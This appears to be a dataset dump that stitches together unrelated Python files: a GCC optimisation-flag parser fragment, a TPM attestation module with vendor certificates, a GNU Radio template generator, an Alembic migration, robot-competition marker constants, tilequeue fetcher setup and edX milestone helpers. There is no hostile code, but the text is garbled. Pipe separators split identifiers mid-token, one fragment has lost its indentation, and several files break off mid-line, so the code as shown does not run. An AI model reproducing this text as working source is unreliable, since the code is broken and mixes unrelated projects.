p1a=os.path.join(pp,f1a)
p1b=os.path.join(pp,f1b)
p2=os.path.join(pp,f2)
if os.path.isfile(p1a) or os.path.isfile(p1b) or os.path.isfile(p2):
# Found GCC source directory with needed files
ck.out('*************************************')
ck.out('Processing GCC directory: '+fn)
ck.out('')
ver=fn[4:]
lver=ver.split('.')
dd={}
iopt=0
iparam=0
p1=''
if os.path.isfile(p1a):
p1=p1a
elif os.path.isfile(p1b):
p1=p1b
if p1!='':
# Load opt file
rx=ck.load_text_file({'text_file':p1,
'split_to_list':'yes',
'encoding':sys.stdin.encoding})
if rx['return']>0: return rx
lopts=rx['lst']
found=False
for q in range(0, len(lopts)):
qq=lopts[q].strip()
if not found:
if qq=='@item Optimization Options':
ck.out('Found optimization flags')
found=True
else:
if qq.startswith('@end ') or qq=='':
break
if qq.startswith('@gccoptlist{'):
qq=qq[11:]
elif qq.startswith('@'):
continue
if qq.endswith('@gol'):
qq=qq[:-5]
jj=qq.split(' ')
# Check if base flag
if len(jj)>0 and jj[0].startswith('-O'):
choice=[]
if '-O3' in jj: choice.append('-O3')
for j in jj:
if j!='' and j!='-O3' and j!='-O':
if j.endswith('}'): j=j[:-1].strip()
choice.append(j)
dd["##base_opt"]={
"choice": choice,
"default": "",
"desc": "base compiler flag",
"sort": 10000,
"tags": [
"base",
"basic",
"optimization"
],
"type": "text"
}
else:
for j in jj:
if j!='' and not j.startswith('--param') and not j.startswith('@') and j.startswith('-f') and \
j.find('profile')==-1 and j.find('coverage')==-1:
|
JohnVillalovos/python-tss-1 | pytss/attestationutils.py | Python | apache-2.0 | 36,880 | 0.000705 | from pytss import TspiContext
from tspi_defines import *
import tspi_exceptions
import uuid
import M2Crypto
from M2Crypto import m2
import pyasn1
import hashlib
import os
import struct
import base64
well_known_secret = bytearray([0] * 20)
srk_uuid = uuid.UUID('{00000000-0000-0000-0000-000000000001}')
trusted_ | certs = { "STM1": """-----BEGIN CERTIFICATE-----
MIIDzDCCArSgAwIBAgIEAAAAATANBgkqhkiG9w0BAQsFADBKMQswCQYDVQQGEwJD
SDEeMBwGA1UEChMVU1RNaWNyb2VsZWN0cm9uaWNzIE5WMRswGQYDVQQDExJTVE0g
VFBNIEVLIFJvb3QgQ0EwHhcNMDkwNzI4MDAwMDAwWhcNMjkxMjMxMDAwMDAwWjBV
MQswCQYDVQQGEwJDSDEeMBwGA1UEChMVU1RNaWNyb2VsZWN0cm9uaWNzIE5WMSYw
JAYDVQQDEx1TVE0gVFBNIEVLIEludGVybWVkaWF0ZSBDQSAwMTCCASIwDQYJKoZI
hvcNAQEBBQADggEPADCCAQoCggEBAJQY | nWO8iw955vWqakWNr3YyazQnNzqV97+l
Qa+wUKMVY+lsyhAyOyXO31j4+clvsj6+JhNEwQtcnpkSc+TX60eZvLhgZPUgRVuK
B9w4GUVyg/db593QUmP8K41Is8E+l32CQdcVh9go0toqf/oS/za1TDFHEHLlB4dC
joKkfr3/hkGA9XJaoUopO2ELt4Otop12aw1BknoiTh1+YbzrZtAlIwK2TX99GW3S
IjaCi+fLoXyK2Fmx8vKnr9JfNL888xK9BQfhZzKmbKm/eLD1e1CFRs1B3z2gd3ax
pW5j1OIkSBMOIUeip5+7xvYo2gor5mxatB+rzSvrWup9AwIcymMCAwEAAaOBrjCB
qzAdBgNVHQ4EFgQU88kVdKbnc/8TvwxrrXp7Zc8ceCAwHwYDVR0jBBgwFoAUb+bF
bAe3bIsKgZKDXMtBHva00ScwRQYDVR0gAQH/BDswOTA3BgRVHSAAMC8wLQYIKwYB
BQUHAgEWIWh0dHA6Ly93d3cuc3QuY29tL1RQTS9yZXBvc2l0b3J5LzAOBgNVHQ8B
Af8EBAMCAAQwEgYDVR0TAQH/BAgwBgEB/wIBADANBgkqhkiG9w0BAQsFAAOCAQEA
uZqViou3aZDGvaAn29gghOkj04SkEWViZR3dU3DGrA+5ZX+zr6kZduus3Hf0bVHT
I318PZGTml1wm6faDRomE8bI5xADWhPiCQ1Gf7cFPiqaPkq7mgdC6SGlQtRAfoP8
ISUJlih0UtsqBWGql4lpk5G6YmvAezguWmMR0/O5Cx5w8YKfXkwAhegGmMGIoJFO
oSzJrS7jK2GnGCuRG65OQVC5HiQY2fFF0JePLWG/D56djNxMbPNGTHF3+yBWg0DU
0xJKYKGFdjFcw0Wi0m2j49Pv3JD1f78c2Z3I/65pkklZGu4awnKQcHeGIbdYF0hQ
LtDSBV4DR9q5GVxSR9JPgQ==
-----END CERTIFICATE-----""" ,
"STM2": """-----BEGIN CERTIFICATE-----
MIIDzDCCArSgAwIBAgIEAAAAAzANBgkqhkiG9w0BAQsFADBKMQswCQYDVQQGEwJD
SDEeMBwGA1UEChMVU1RNaWNyb2VsZWN0cm9uaWNzIE5WMRswGQYDVQQDExJTVE0g
VFBNIEVLIFJvb3QgQ0EwHhcNMTEwMTIxMDAwMDAwWhcNMjkxMjMxMDAwMDAwWjBV
MQswCQYDVQQGEwJDSDEeMBwGA1UEChMVU1RNaWNyb2VsZWN0cm9uaWNzIE5WMSYw
JAYDVQQDEx1TVE0gVFBNIEVLIEludGVybWVkaWF0ZSBDQSAwMjCCASIwDQYJKoZI
hvcNAQEBBQADggEPADCCAQoCggEBAJO3ihn/uHgV3HrlPZpv8+1+xg9ccLf3pVXJ
oT5n8PHHixN6ZRBmf/Ng85/ODZzxnotC64WD8GHMLyQ0Cna3MJF+MGJZ5R5JkuJR
B4CtgTPwcTVZIsCuup0aDWnPzYqHwvfaiD2FD0aaxCnTKIjWU9OztTD2I61xW2LK
EY4Vde+W3C7WZgS5TpqkbhJzy2NJj6oSMDKklfI3X8jVf7bngMcCR3X3NcIo349I
Dt1r1GfwB+oWrhogZVnMFJKAoSYP8aQrLDVl7SQOAgTXz2IDD6bo1jga/8Kb72dD
h8D2qrkqWh7Hwdas3jqqbb9uiq6O2dJJY86FjffjXPo3jGlFjTsCAwEAAaOBrjCB
qzAdBgNVHQ4EFgQUVx+Aa0fM55v6NZR87Yi40QBa4J4wHwYDVR0jBBgwFoAUb+bF
bAe3bIsKgZKDXMtBHvaO0ScwRQYDVR0gAQH/BDswOTA3BgRVHSAAMC8wLQYIKwYB
BQUHAgEWIWh0dHA6Ly93d3cuc3QuY29tL1RQTS9yZXBvc2l0b3J5LzAOBgNVHQ8B
Af8EBAMCAAQwEgYDVR0TAQH/BAgwBgEB/wIBATANBgkqhkiG9w0BAQsFAAOCAQEA
4gllWq44PFWcv0JgMPOtyXDQx30YB5vBpjS0in7f/Y/r+1Dd8q3EZwNOwYApe+Lp
/ldNqCXw4XzmO8ZCVWOdQdVOqHZuSOhe++Jn0S7M4z2/1PQ6EbRczGfw3dlX63Ec
cEnrn6YMcgPC63Q+ID53vbTS3gpeX/SGpngtVwnzpuJ5rBajqSQUo5jBTBtuGQpO
Ko6Eu7U6Ouz7BVgOSn0mLbfSRb77PjOLZ3+97gSiMmV0iofS7ufemYqA8sF7ZFv/
lM2eOe/eeS56Jw+IPsnEU0Tf8Tn9hnEig1KP8VByRTWAJgiEOgX2nTs5iJbyZeIZ
RUjDHQQ5onqhgjpfRsC95g==
-----END CERTIFICATE-----""",
"NTC1": """-----BEGIN CERTIFICATE-----
MIIDSjCCAjKgAwIBAgIGAK3jXfbVMA0GCSqGSIb3DQEBBQUAMFIxUDAcBgNVBAMT
FU5UQyBUUE0gRUsgUm9vdCBDQSAwMTAlBgNVBAoTHk51dm90b24gVGVjaG5vbG9n
eSBDb3Jwb3JhdGlvbjAJBgNVBAYTAlRXMB4XDTEyMDcxMTE2MjkzMFoXDTMyMDcx
MTE2MjkzMFowUjFQMBwGA1UEAxMVTlRDIFRQTSBFSyBSb290IENBIDAxMCUGA1UE
ChMeTnV2b3RvbiBUZWNobm9sb2d5IENvcnBvcmF0aW9uMAkGA1UEBhMCVFcwggEi
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDoNqxhtD4yUtXhqKQGGZemoKJy
uj1RnWvmNgzItLeejNU8B6fOnpMQyoS4K72tMhhFRK2jV9RYzyJMSjEwyX0ASTO1
2yMti2UJQS60d36eGwk8WLgrFnnITlemshi01h9t1MOmay3TO1LLH/3/VDKJ+jbd
cbfIO2bBquN8r3/ojYUaNSPj6pK1mmsMoJXF4dGRSEwb/4ozBIw5dugm1MEq4Zj3
GZ0YPg5wyLRugQbt7DkUOX4FGuK5p/C0u5zX8u33EGTrDrRz3ye3zO+aAY1xXF/m
qwEqgxX5M8f0/DXTTO/CfeIksuPeOzujFtXfi5Cy64eeIZ0nAUG3jbtnGjoFAgMB
AAGjJjAkMA4GA1UdDwEB/wQEAwICBDASBgNVHRMBAf8ECDAGAQH/AgEAMA0GCSqG
SIb3DQEBBQUAA4IBAQBBQznOPJAsD4Yvyt/hXtVJSgBX/+rRfoaqbdt3UMbUPJYi
pUoTUgaTx02DVRwommO+hLx7CS++1F2zorWC8qQyvNbg7iffQbbjWitt8NPE6kCr
q0Y5g7M/LkQDd5N3cFfC15uFJOtlj+A2DGzir8dlXU/0qNq9dBFbi+y+Y3rAT+wK
fktmN82UT861wTUzDvnXO+v7H5DYXjUU8kejPW6q+GgsccIbVTOdHNNWbMrcD9yf
oS91nMZ/+/n7IfFWXNN82qERsrvOFCDsbIzUOR30N0IP++oqGfwAbKFfCOCFUz6j
jpXUdJlh22tp12UMsreibmi5bsWYBgybwSbRgvzE
-----END CERTIFICATE-----""",
"NTC2": """-----BEGIN CERTIFICATE-----
MIIDSjCCAjKgAwIBAgIGAPadBmPZMA0GCSqGSIb3DQEBBQUAMFIxUDAcBgNVBAMT
FU5UQyBUUE0gRUsgUm9vdCBDQSAwMjAlBgNVBAoTHk51dm90b24gVGVjaG5vbG9n
eSBDb3Jwb3JhdGlvbjAJBgNVBAYTAlRXMB4XDTEyMDcxMTE2MzMyNFoXDTMyMDcx
MTE2MzMyNFowUjFQMBwGA1UEAxMVTlRDIFRQTSBFSyBSb290IENBIDAyMCUGA1UE
ChMeTnV2b3RvbiBUZWNobm9sb2d5IENvcnBvcmF0aW9uMAkGA1UEBhMCVFcwggEi
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDSagWxaANT1YA2YUSN7sq7yzOT
1ymbIM+WijhE5AGcLwLFoJ9fmaQrYL6fAW2EW/Q3yu97Q9Ysr8yYZ2XCCfxfseEr
Vs80an8Nk6LkTDz8+0Hm0Cct0klvNUAZEIvWpmgHZMvGijXyOcp4z494d8B28Ynb
I7x0JMXZZQQKQi+WfuHtntF+2osYScweocipPrGeONLKU9sngWZ2vnnvw1SBneTa
irxq0Q0SD6Bx9jtxvdf87euk8JzfPhX8jp8GEeAjmLwGR+tnOQrDmczGNmp7YYNN
R+Q7NZVoYWHw5jaoZnNxbouWUXZZxFqDsB/ndCKWtsIzRYPuWcqrFcmUN4SVAgMB
AAGjJjAkMA4GA1UdDwEB/wQEAwICBDASBgNVHRMBAf8ECDAGAQH/AgEAMA0GCSqG
SIb3DQEBBQUAA4IBAQAIkdDSErzPLPYrVthw4lKjW4tRYelUicMPEHKjQeVUAAS5
y9XTzB4DWISDAFsgtQjqHJj0xCG+vpY0Rmn2FCO/0YpP+YBQkdbJOsiyXCdFy9e4
gGjQ24gw1B+rr84+pkI51y952NYBdoQDeb7diPe+24U94f//DYt/JQ8cJua4alr3
2Pohhh5TxCXXfU2EHt67KyqBSxCSy9m4OkCOGLHL2X5nQIdXVj178mw6DSAwyhwR
n3uJo5MvUEoQTFZJKGSXfab619mIgzEr+YHsIQToqf44VfDMDdM+MFiXQ3a5fLii
hEKQ9DhBPtpHAbhFA4jhCiG9HA8FdEplJ+M4uxNz
-----END CERTIFICATE-----""",
"IFX1": """-----BEGIN CERTIFICATE-----
MIIEnzCCA4egAwIBAgIEMV64bDANBgkqhkiG9w0BAQUFADBtMQswCQYDVQQGEwJE
RTEQMA4GA1UECBMHQmF2YXJpYTEhMB8GA1UEChMYSW5maW5lb24gVGVjaG5vbG9n
aWVzIEFHMQwwCgYDVQQLEwNBSU0xGzAZBgNVBAMTEklGWCBUUE0gRUsgUm9vdCBD
QTAeFw0wNTEwMjAxMzQ3NDNaFw0yNTEwMjAxMzQ3NDNaMHcxCzAJBgNVBAYTAkRF
MQ8wDQYDVQQIEwZTYXhvbnkxITAfBgNVBAoTGEluZmluZW9uIFRlY2hub2xvZ2ll
cyBBRzEMMAoGA1UECxMDQUlNMSYwJAYDVQQDEx1JRlggVFBNIEVLIEludGVybWVk
aWF0ZSBDQSAwMTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALftPhYN
t4rE+JnU/XOPICbOBLvfo6iA7nuq7zf4DzsAWBdsZEdFJQfaK331ihG3IpQnlQ2i
YtDim289265f0J4OkPFpKeFU27CsfozVaNUm6UR/uzwA8ncxFc3iZLRMRNLru/Al
VG053ULVDQMVx2iwwbBSAYO9pGiGbk1iMmuZaSErMdb9v0KRUyZM7yABiyDlM3cz
UQX5vLWV0uWqxdGoHwNva5u3ynP9UxPTZWHZOHE6+14rMzpobs6Ww2RR8BgF96rh
4rRAZEl8BXhwiQq4STvUXkfvdpWH4lzsGcDDtrB6Nt3KvVNvsKz+b07Dk+Xzt+EH
NTf3Byk2HlvX+scCAwEAAaOCATswggE3MB0GA1UdDgQWBBQ4k8292HPEIzMV4bE7
qWoNI8wQxzAOBgNVHQ8BAf8EBAMCAgQwEgYDVR0TAQH/BAgwBgEB/wIBADBYBgNV
HSABAf8ETjBMMEoGC2CGSAGG+EUBBy8BMDswOQYIKwYBBQUHAgEWLWh0dHA6Ly93
d3cudmVyaXNpZ24uY29tL3JlcG9zaXRvcnkvaW5kZXguaHRtbDCBlwYDVR0jBIGP
MIGMgBRW65FEhWPWcrOu1EWWC/eUDlRCpqFxpG8wbTELMAkGA1UEBhMCREUxEDAO
BgNVBAgTB0JhdmFyaWExITAfBgNVBAoTGEluZmluZW9uIFRlY2hub2xvZ2llcyBB
RzEMMAoGA1UECxMDQUlNMRswGQYDVQQDExJJRlggVFBNIEVLIFJvb3QgQ0GCAQMw
DQYJKoZIhvcNAQEFBQADggEBABJ1+Ap3rNlxZ0FW0aIgdzktbNHlvXWNxFdYIBbM
OKjmbOos0Y4O60eKPu259XmMItCUmtbzF3oKYXq6ybARUT2Lm+JsseMF5VgikSlU
BJALqpKVjwAds81OtmnIQe2LSu4xcTSavpsL4f52cUAu/maMhtSgN9mq5roYptq9
DnSSDZrX4uYiMPl//rBaNDBflhJ727j8xo9CCohF3yQUoQm7coUgbRMzyO64yMIO
3fhb+Vuc7sNwrMOz3VJN14C3JMoGgXy0c57IP/kD5zGRvljKEvrRC2I147+fPeLS
DueRMS6lblvRKiZgmGAg7YaKOkOaEmVDMQ+fTo2Po7hI5wc=
-----END CERTIFICATE-----""",
"IFX2": """-----BEGIN CERTIFICATE-----
MIIEnzCCA4egAwIBAgIEaItIgTANBgkqhkiG9w0BAQUFADBtMQswCQYDVQQGEwJE
RTEQMA4GA1UECBMHQmF2YXJpYTEhMB8GA1UEChMYSW5maW5lb24gVGVjaG5vbG9n
aWVzIEFHMQwwCgYDVQQLEwNBSU0xGzAZBgNVBAMTEklGWCBUUE0gRUsgUm9vdCBD
QTAeFw0wNjEyMjExMDM0MDBaFw0yNjEyMjExMDM0MDBaMHcxCzAJBgNVBAYTAkRF
MQ8wDQYDVQQIEwZTYXhvbnkxITAfBgNVBAoTGEluZmluZW9uIFRlY2hub2xvZ2ll
cyBBRzEMMAoGA1UECxMDQUlNMSYwJAYDVQQDEx1JRlggVFBNIEVLIEludGVybWVk
aWF0ZSBDQSAwMjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAK6KnP5R
8ppq9TtPu3mAs3AFxdWhzK5ks+BixGR6mpzyXG64Bjl4xzBXeBIVtlBZXYvIAJ5s
eCTEEsnZc9eKNJeFLdmXQ/siRrTeonyxoS4aL1mVEQebLUz2gN9J6j1ewly+OvGk
jEYouGCzA+fARzLeRIrhuhBI0kUChbH7VM8FngJsbT4xKB3EJ6Wttma25VSimkAr
SPS6dzUDRS1OFCWtAtHJW6YjBnA4wgR8WfpXsnjeNpwEEB+JciWu1VAueLNI+Kis
RiferCfsgWRvHkR6RQf04h+FlhnYHJnf1ktqcEi1oYAjLsbYOAwqyoU1Pev9cS28
EA6FTJcxjuHhH9ECAwEAAaOCATswggE3MB0GA1UdDgQWBBRDMlr1 |
riveridea/gnuradio | gr-utils/python/modtool/code_generator.py | Python | gpl-3.0 | 2,485 | 0.000805 | #
# Copyright 2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either v | ersion 3, | or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
""" A code generator (needed by ModToolAdd) """
from templates import Templates
import Cheetah.Template
from util_functions import str_to_fancyc_comment
from util_functions import str_to_python_comment
from util_functions import strip_default_values
from util_functions import strip_arg_types
from util_functions import strip_arg_types_grc
class GRMTemplate(Cheetah.Template.Template):
""" An extended template class """
def __init__(self, src, searchList):
self.grtypelist = {
'sync': 'sync_block',
'sink': 'sync_block',
'source': 'sync_block',
'decimator': 'sync_decimator',
'interpolator': 'sync_interpolator',
'general': 'block',
'tagged_stream': 'tagged_stream_block',
'hier': 'hier_block2',
'noblock': ''}
searchList['str_to_fancyc_comment'] = str_to_fancyc_comment
searchList['str_to_python_comment'] = str_to_python_comment
searchList['strip_default_values'] = strip_default_values
searchList['strip_arg_types'] = strip_arg_types
searchList['strip_arg_types_grc'] = strip_arg_types_grc
Cheetah.Template.Template.__init__(self, src, searchList=searchList)
self.grblocktype = self.grtypelist[searchList['blocktype']]
if searchList['is_component']:
self.include_dir_prefix = "gnuradio/" + searchList['modname']
else:
self.include_dir_prefix = searchList['modname']
def get_template(tpl_id, **kwargs):
""" Return the template given by tpl_id, parsed through Cheetah """
return str(GRMTemplate(Templates[tpl_id], searchList=kwargs))
|
pypingou/pagure | alembic/versions/1640c7d75e5f_add_reports_field_to_project.py | Python | gpl-2.0 | 579 | 0.003454 | """Add reports field to project
Revisi | on ID: 1640c7d75e5f
Revises: 1d18843a1994
Create Date: 2016-09-09 16:11:28.099423
"""
# revision identifiers, used by Alembic.
revision = '1640c7d75e5f'
down_revision = '1d18843a1994'
from alembic import op
import sqlalchemy as sa
def upgrade():
''' Add the column _reports to the table projects
'''
op.add_column(
'projects',
sa.Column('_reports', sa.Text, nullable=True)
)
def downgrade():
''' Drop the col | umn _reports from the table projects.
'''
op.drop_column('projects', '_reports')
|
sourcebots/robot-api | robot/game_specific.py | Python | mit | 2,127 | 0 | # ******************************************************************************
# NOTICE: IF YOU CHANGE THIS FILE PLEASE CHANGE ITS COUNTERPART IN SB_VISION
# ******************************************************************************
# Try to put all game specific code in here
WALL = set(range(0, 28)) # 0 - 27
# Currently for Smallpeice 2018
GAME_DURATION_SECONDS = 120
# Currently for SB2018
COLUMN_N = set(range(28, 32))
COLUMN_E = set(range(32, 36))
COLUMN_S = set(range(36, 40))
COLUMN_W = set(range(40, 44))
COLUMN_FACING_N = set(range(28, 44, 4))
COLUMN_FACING_E = set(range(29, 44, 4))
COLUMN_FACING_S = set( | range(30, 44, 4))
COLUMN_FACING_W = set(range(31, 44, 4))
# Individual Column faces.
COLUMN_N_FACING_N = (COLUMN_N & COLUMN_FACING_N).pop()
COLUMN_N_FACING_S = (COLUMN_N & COLUMN_FACING_S).pop()
COLUMN_N_FACING_E = (COLUMN_N & COLUMN_FACING_E).pop()
COLUMN_N_FACING_W = (COLUMN_N & COLUMN_FACING_W).pop()
COLUMN_S_FACING_N = (COLUMN_S & COLUMN_FACING_N).pop()
COLUMN_S_FACING_S = (COLUMN_S & COLUMN_FACING_S).pop()
C | OLUMN_S_FACING_E = (COLUMN_S & COLUMN_FACING_E).pop()
COLUMN_S_FACING_W = (COLUMN_S & COLUMN_FACING_W).pop()
COLUMN_E_FACING_N = (COLUMN_E & COLUMN_FACING_N).pop()
COLUMN_E_FACING_S = (COLUMN_E & COLUMN_FACING_S).pop()
COLUMN_E_FACING_E = (COLUMN_E & COLUMN_FACING_E).pop()
COLUMN_E_FACING_W = (COLUMN_E & COLUMN_FACING_W).pop()
COLUMN_W_FACING_N = (COLUMN_W & COLUMN_FACING_N).pop()
COLUMN_W_FACING_S = (COLUMN_W & COLUMN_FACING_S).pop()
COLUMN_W_FACING_E = (COLUMN_W & COLUMN_FACING_E).pop()
COLUMN_W_FACING_W = (COLUMN_W & COLUMN_FACING_W).pop()
COLUMN = (COLUMN_N | COLUMN_E | COLUMN_S | COLUMN_W)
TOKEN = set(range(44, 64))
TOKEN_ZONE_0 = set(range(44, 49))
TOKEN_ZONE_1 = set(range(49, 54))
TOKEN_ZONE_2 = set(range(54, 59))
TOKEN_ZONE_3 = set(range(59, 64))
# The following constants are used to define the marker sizes
MARKER_SIZES = {}
MARKER_SIZES.update({m: (0.25, 0.25) for m in (WALL | COLUMN)})
MARKER_SIZES.update({m: (0.1, 0.1) for m in TOKEN})
# Size the vision system will assume a marker is if it's not in MARKER_SIZES
MARKER_SIZE_DEFAULT = (0.25, 0.25)
|
mapzen/tilequeue | tilequeue/query/__init__.py | Python | mit | 6,789 | 0 | from tilequeue.query.fixture import make_fixture_data_fetcher
from tilequeue.query.pool import DBConnectionPool
from tilequeue.query.postgres import make_db_data_fetcher
from tilequeue.query.rawr import make_rawr_data_fetcher
from tilequeue.query.split import make_split_data_fetcher
from tilequeue.process import Source
from tilequeue.store import make_s3_tile_key_generator
__all__ = [
'DBConnectionPool',
'make_db_data_fetcher',
'make_fixture_data_fetcher',
'make_data_fetcher',
]
def make_data_fetcher(cfg, layer_data, query_cfg, io_pool):
db_fetcher = make_db_data_fetcher(
cfg.postgresql_conn_info, cfg.template_path, cfg.reload_templates,
query_cfg, io_pool)
if cfg.yml.get('use-rawr-tiles'):
rawr_fetcher = _make_rawr_fetcher(
cfg, layer_data, query_cfg, io_pool)
group_by_zoom = cfg.yml.get('rawr').get('group-zoom')
assert group_by_zoom is not None, 'Missing group-zoom rawr config'
return make_split_data_fetcher(
group_by_zoom, db_fetcher, rawr_fetcher)
else:
return db_fetcher
class _NullRawrStorage(object):
def __init__(self, data_source, table_sources):
self.data_source = data_source
self.table_sources = table_sources
def __call__(self, tile):
# returns a "tables" object, which responds to __call__(table_name)
# with tuples for that table.
data = {}
for location in self.data_source(tile):
data[location.name] = location.records
def _tables(table_name):
from tilequeue.query.common import Table
source = self.table_sources[table_name]
return Table(source, data.get(table_name, []))
return _tables
def _make_rawr_fetcher(cfg, layer_data, query_cfg, io_pool):
rawr_yaml = cfg.yml.get('rawr')
assert rawr_yaml is not None, 'Missing rawr configuration in yaml'
group_by_zoom = rawr_yaml.get('group-zoom')
assert group_by_zoom is not None, 'Missing group-zoom rawr config'
rawr_source_yaml = rawr_yaml.get('source')
assert rawr_source_yaml, 'Missing rawr source config'
table_sources = rawr_source_yaml.get('table-sources')
assert table_sources, 'Missing definitions of source per table'
# map text for table source onto Source objects
for tbl, data in table_sources.items():
source_name = data['name']
source_value = data['value']
table_sources[tbl] = Source(source_name, source_value)
label_placement_layers = rawr_yaml.get('label-placement-layers', {})
for geom_type, layers in label_placement_layers.items():
assert geom_type in ('point', 'polygon', 'linestring'), \
'Geom type %r not understood, expecting point, polygon or ' \
'linestring.' % (geom_type,)
label_placement_layers[geom_type] = set(layers)
indexes_cfg = rawr_yaml.get('indexes')
assert indexes_cfg, 'Missing definitions of table indexes.'
# source types are:
# s3 - to fetch RAWR tiles from S3
# store - to fetch RAWR tiles from any tilequeue tile source
# generate - to generate RAWR tiles directly, rather than trying to load
# them from S3. this can be useful for standalone use and
# testing. provide a postgresql subkey for database connection
# settings.
source_type = rawr_source_yaml.get('type | ')
if source_type == 's3':
rawr_source_s3_yaml = rawr_source_yaml.get('s3')
bucke | t = rawr_source_s3_yaml.get('bucket')
assert bucket, 'Missing rawr source s3 bucket'
region = rawr_source_s3_yaml.get('region')
assert region, 'Missing rawr source s3 region'
prefix = rawr_source_s3_yaml.get('prefix')
assert prefix, 'Missing rawr source s3 prefix'
extension = rawr_source_s3_yaml.get('extension')
assert extension, 'Missing rawr source s3 extension'
allow_missing_tiles = rawr_source_s3_yaml.get(
'allow-missing-tiles', False)
import boto3
from tilequeue.rawr import RawrS3Source
s3_client = boto3.client('s3', region_name=region)
tile_key_gen = make_s3_tile_key_generator(rawr_source_s3_yaml)
storage = RawrS3Source(
s3_client, bucket, prefix, extension, table_sources, tile_key_gen,
allow_missing_tiles)
elif source_type == 'generate':
from raw_tiles.source.conn import ConnectionContextManager
from raw_tiles.source.osm import OsmSource
postgresql_cfg = rawr_source_yaml.get('postgresql')
assert postgresql_cfg, 'Missing rawr postgresql config'
conn_ctx = ConnectionContextManager(postgresql_cfg)
rawr_osm_source = OsmSource(conn_ctx)
storage = _NullRawrStorage(rawr_osm_source, table_sources)
elif source_type == 'store':
from tilequeue.store import make_store
from tilequeue.rawr import RawrStoreSource
store_cfg = rawr_source_yaml.get('store')
store = make_store(store_cfg,
credentials=cfg.subtree('aws credentials'))
storage = RawrStoreSource(store, table_sources)
else:
assert False, 'Source type %r not understood. ' \
'Options are s3, generate and store.' % (source_type,)
# TODO: this needs to be configurable, everywhere! this is a long term
# refactor - it's hard-coded in a bunch of places :-(
max_z = 16
layers = _make_layer_info(layer_data, cfg.process_yaml_cfg)
return make_rawr_data_fetcher(
group_by_zoom, max_z, storage, layers, indexes_cfg,
label_placement_layers)
def _make_layer_info(layer_data, process_yaml_cfg):
from tilequeue.query.common import LayerInfo, ShapeType
layers = {}
functions = _parse_yaml_functions(process_yaml_cfg)
for layer_datum in layer_data:
name = layer_datum['name']
min_zoom_fn, props_fn = functions[name]
shape_types = ShapeType.parse_set(layer_datum['geometry_types'])
layer_info = LayerInfo(min_zoom_fn, props_fn, shape_types)
layers[name] = layer_info
return layers
def _parse_yaml_functions(process_yaml_cfg):
from tilequeue.command import make_output_calc_mapping
from tilequeue.command import make_min_zoom_calc_mapping
output_layer_data = make_output_calc_mapping(process_yaml_cfg)
min_zoom_layer_data = make_min_zoom_calc_mapping(process_yaml_cfg)
keys = set(output_layer_data.keys())
assert keys == set(min_zoom_layer_data.keys())
functions = {}
for key in keys:
min_zoom_fn = min_zoom_layer_data[key]
output_fn = output_layer_data[key]
functions[key] = (min_zoom_fn, output_fn)
return functions
|
eduNEXT/edx-platform | common/djangoapps/util/milestones_helpers.py | Python | agpl-3.0 | 16,458 | 0.002917 | """
Utility library for working with the edx-milestones app
"""
from django.conf import settings
from django.utils.translation import gettext as _
from edx_toggles.toggles import SettingDictToggle
from milestones import api as milestones_api
from milestones.exceptions import InvalidMilestoneRelationshipTypeException, InvalidUserException
from milestones.models import MilestoneRelationshipType
from milestones.services import MilestonesService
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from openedx.core.djangoapps.content.course_overviews.models import CourseOverview
from openedx.core.lib.cache_utils import get_cache
from xmodule.modulestore.django import modulestore # lint-amnesty, pylint: disable=wrong-import-order
NAMESPACE_CHOICES = {
'ENTRANCE_EXAM': 'entrance_exams'
}
REQUEST_CACHE_NAME = "milestones"
# TODO this should be moved to edx/edx-milestones
# .. toggle_name: FEATURES['MILESTONES_APP']
# .. toggle_implementation: SettingDictToggle
# .. toggle_default: False
# .. toggle_description: Enable the milestones application, which manages significant Course and/or Student events in
# the Open edX platform. (see https://github.com/edx/edx-milestones) Note that this feature is required to enable
# course pre-requisites.
# .. toggle_us | e_cases: open_edx
# .. toggle_creation_date: 2014-11-21
ENABLE_MILESTONES_APP = SettingDictToggle("FEATURES", "MILESTONES_APP", default=False, module_name= | __name__)
def get_namespace_choices():
"""
Return the enum to the caller
"""
return NAMESPACE_CHOICES
def is_prerequisite_courses_enabled():
"""
Returns boolean indicating prerequisite courses enabled system wide or not.
"""
return settings.FEATURES.get('ENABLE_PREREQUISITE_COURSES') and ENABLE_MILESTONES_APP.is_enabled()
def add_prerequisite_course(course_key, prerequisite_course_key):
"""
It would create a milestone, then it would set newly created
milestones as requirement for course referred by `course_key`
and it would set newly created milestone as fulfillment
milestone for course referred by `prerequisite_course_key`.
"""
if not is_prerequisite_courses_enabled():
return None
milestone_name = _('Course {course_id} requires {prerequisite_course_id}').format(
course_id=str(course_key),
prerequisite_course_id=str(prerequisite_course_key)
)
milestone = milestones_api.add_milestone({
'name': milestone_name,
'namespace': str(prerequisite_course_key),
'description': _('System defined milestone'),
})
# add requirement course milestone
milestones_api.add_course_milestone(course_key, 'requires', milestone)
# add fulfillment course milestone
milestones_api.add_course_milestone(prerequisite_course_key, 'fulfills', milestone)
def remove_prerequisite_course(course_key, milestone):
"""
It would remove pre-requisite course milestone for course
referred by `course_key`.
"""
if not is_prerequisite_courses_enabled():
return None
milestones_api.remove_course_milestone(
course_key,
milestone,
)
def set_prerequisite_courses(course_key, prerequisite_course_keys):
"""
It would remove any existing requirement milestones for the given `course_key`
and create new milestones for each pre-requisite course in `prerequisite_course_keys`.
To only remove course milestones pass `course_key` and empty list or
None as `prerequisite_course_keys` .
"""
if not is_prerequisite_courses_enabled():
return None
#remove any existing requirement milestones with this pre-requisite course as requirement
course_milestones = milestones_api.get_course_milestones(course_key=course_key, relationship="requires")
if course_milestones:
for milestone in course_milestones:
remove_prerequisite_course(course_key, milestone)
